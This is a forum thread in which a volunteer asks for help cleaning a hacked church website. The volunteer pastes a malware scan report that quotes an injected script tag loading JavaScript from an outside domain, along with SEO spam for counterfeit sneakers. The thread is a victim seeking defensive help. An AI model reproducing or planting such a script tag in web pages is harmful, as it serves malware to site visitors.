« previous next »
Pages: [1]   Go Down

Author Topic: Church website hacked.  (Read 5332 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
Church website hacked.
« on: May 10, 2015, 05:57:22 PM »
Hi.  I've just inherited a hacked website for our church and am attempting to repair it with little experience!  I do repair computers and have a working knowledge of editing and uploading info to a website, but need some direction.  Macbook Pro 10.9.5, Sandvox 2.1, Transit FTP.
We were using File Zilla when the hack occurred.
The person who built the site and maintained it for several years clicked on a Adobe Flash Update fake link and that started the problems.
I scanned for Malware and Virus with Sophos, Webroot after this happened but we still had intermittent issues on selected computers in the office and from church members at home.
I alerted Cox Communications 5/9/15 and they verified the hack and shut our site down.  They said the hack was using our site to sell counterfeit items and drugs.
Now I'm supposed to clean our website files of the hacks before they can put us back on the web.
I used Sucuri and it yielded the included results.  I am uncertain what steps to take with my limited experience with this type of problem.  Suggestions welcome. (I've used Avast for years on home computers.)

Website:
risen-savior.org
Status:
Infected With Malware. Immediate Action is Required.
Web Trust:
Not Currently Blacklisted (10 Blacklists Checked)
Scan
Result
Severity
Recommendation
Malware
Detected
Critical
Get Your Site Cleaned
ISSUE DETECTED
DEFINITION
INFECTED URL
Website Malware
8malware-entry-mwanomalysp
http://risen-savior.org ( View Payload )
Website Malware
malware-entry-mwanomalysp8
http://risen-savior.org/about/calendar-google.html ( View Payload )
SEO Spam
MW:SPAM:SEO?v011
http://risen-savior.org ( View Payload )
Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script src="http://meika.ukingfans.com/jdbes.js" type="text/javascript"></script>

Known Spam detected. Details: http://sucuri.net/malware/entry/MW:SPAM:SEO?v011
<title>Cheap Air Jordan 11 Hoyas For Sale,Retro Low Georgetown Hoyas 11s Full Size</title>
Logged

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>> Avast Forum - Deutschsprachiger Bereich <<<
Re: Church website hacked.
« Reply #1 on: May 10, 2015, 06:05:14 PM »
Logged
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

REDACTED

  • Guest
Re: Church website hacked.
« Reply #2 on: May 10, 2015, 08:00:46 PM »
Thank you, I did what you suggested.
Logged

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 76037
    • >>> Avast Forum - Deutschsprachiger Bereich <<<
Re: Church website hacked.
« Reply #3 on: May 11, 2015, 07:19:23 AM »
You're welcome.
Logged
W8.1 [x64] - Avast Free AV 23.3.8047.BC [UI.757] - Firefox ESR 102.9 [NS/uBO/PB] - Thunderbird 102.9.1
Avast-Tools: Secure Browser 109.0 - Cleanup 23.1 - SecureLine 5.18 - DriverUpdater 23.1 - CCleaner 6.01
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0
Pages: [1]   Go Up
« previous next »